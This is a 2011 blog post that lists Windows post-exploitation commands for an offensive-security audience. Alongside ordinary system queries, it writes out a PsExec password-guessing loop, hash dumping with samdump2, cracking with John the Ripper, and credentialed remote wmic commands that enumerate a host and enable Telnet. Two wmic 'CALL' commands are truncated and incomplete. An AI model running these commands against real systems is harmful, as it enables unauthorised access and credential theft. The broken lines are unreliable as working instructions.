Computer Security Blog | Learning The Offensive Security: Howto: Command For Information Gathering Of Windows Post Exploitation

Sep 25, 2011

Howto: Command For Information Gathering Of Windows Post Exploitation

If you want to see all command and results of each command, please go to the Source.

gathering System related information

C:\>systeminfo

Running Services

C:\>tasklist /svc

Installed Services

C:\>sc query state= all

Current environment settings

C:\>set

Find Username

C:\>set | find "USERNAME"

Find Domain

C:\>set | find "USERDOMAIN"

Find Current User Information

C:\>net user John

Find Users with Administrator Privileges in the current machine

C:\>net localgroup Administrators

Password Guessing with PsExec

Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt

C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************

Extract Hashes from the sam and system file with samdump2

root@bt:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist

root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS Information

C:\>ipconfig /displaydns

OS Information

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion

Installed Software

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Process

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local Drives Info

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get

Shares Info

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network Info

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get

List Services Information

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET

Change start mode of service to automatically start upon boot

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Starting telnet service

C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping Sweep

C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"

Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html

If you like my blog, Please Donate Me

Sep 25, 2011

Howto: Command For Information Gathering Of Windows Post Exploitation

No comments: